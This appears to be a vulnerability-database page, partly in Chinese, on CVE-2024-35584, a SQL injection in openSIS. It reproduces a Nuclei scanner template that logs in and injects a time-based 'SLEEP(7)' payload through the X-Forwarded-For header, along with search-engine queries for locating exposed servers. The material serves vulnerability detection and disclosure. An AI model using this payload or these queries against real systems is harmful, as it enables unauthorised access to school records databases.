CVE-2024-35584: openSIS < 9.1 - SQL Injection

日期: 2025-08-01 | 影响软件: openSIS | POC: 已公开

漏洞描述

SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1, 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from "X-Forwarded-For" header and appends it to a SQL INSERT statement directly, leading to SQL Injection.

PoC代码[已公开]

id: CVE-2024-35584

info:
  name: openSIS < 9.1 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1, 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from "X-Forwarded-For" header and appends it to a SQL INSERT statement directly, leading to SQL Injection.
  reference:
    - https://www.tenable.com/cve/CVE-2024-35584
    - https://vuldb.com/?id.280406
    - https://github.com/whwhwh96/CVE-2024-35584
    - https://github.com/OS4ED/openSIS-Classic
    - http://opensis.com
    - https://nvd.nist.gov/vuln/detail/CVE-2024-35584
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-35584
    cwe-id: CWE-89
    epss-score: 0.72757
    epss-percentile: 0.98736
  metadata:
    max-request: 2
    vendor: os4ed
    product: opensis
    shodan-query: http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2024,opensis,authenticated,sqli

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=

      - |
        @timeout 20s
        GET /Ajax.php?modname=tools/notallowed.php HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 122.122.122.122' AND SLEEP(7) AND '1'='1

    matchers:
      - type: dsl
        dsl:
          - duration_2>=7
          - contains(body_1, "openSIS") && contains_all(body_2, "donetext:", "\'Done\'")
          - status_code_1 == 200 && status_code_2 == 200
        condition: and
# digest: 4b0a00483046022100ec7818884e4f5c54ca88b416381f652889bdf9ec2e488b2a98e9ed95012d243b022100f30ad5dab4d09265fa0f072f22e705604f22a1ab82a21a116526d753703db9f5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-35584.yaml

相关漏洞推荐